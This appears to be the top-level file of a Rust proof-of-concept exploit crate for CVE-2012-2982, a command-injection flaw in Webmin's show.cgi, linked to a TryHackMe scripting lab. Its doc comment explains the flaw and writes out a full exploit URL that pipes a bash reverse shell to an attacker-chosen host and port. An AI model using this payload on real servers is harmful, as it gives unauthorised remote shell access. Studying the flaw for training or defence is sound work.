//! ## CVE-2012-2982
//! 
//! **CVE-2012-2982** is an **RCE** vulnerability affecting **Webmin** versions **1.140..=1.590**.
//! 
//! The vulnerability exists because of a function parameter missing input sanitization 
//! in the [*show.cgi*](https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213) component.
//! 
//! By including an invalid character in the path section of the URL, 
//! an authenticated user can send a request to the */file/show.cgi/bin* endpoint 
//! which will pipe their input to be executed by the system shell.
//! 
//! Conveniently, the "|" pipe character also works as an invalid character for this purpose.
//! 
//! The resulting exploit payload looks something like this below (*before url encoding*): <br>
//! `http://{rhost}:{rport}/file/show.cgi/bin/4e2fc|bash -c 'exec bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'|`
//!  
//! ## Resources
//! **CVE-2012-2982 - NVD:** <https://nvd.nist.gov/vuln/detail/CVE-2012-2982> <br>
//! **Intro to PoC Scripting:** <https://tryhackme.com/room/intropocscripting>

pub mod args;
pub mod exploit;